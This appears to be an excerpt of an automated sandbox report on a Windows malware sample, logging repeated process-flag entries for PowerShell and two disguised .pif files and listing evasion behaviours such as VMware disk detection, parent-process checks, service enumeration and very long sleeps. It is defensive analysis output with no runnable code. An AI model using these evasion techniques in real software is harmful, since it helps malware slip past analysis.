Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233F7A7 Sleep,ExitProcess,

24_2_1233F7A7

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\svchost.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,

27_2_0040DD85

Contains functionality to enumerate running services

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

24_2_1234A748

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5574	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4195	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Window / User API: threadDelayed 9520	Jump to behavior
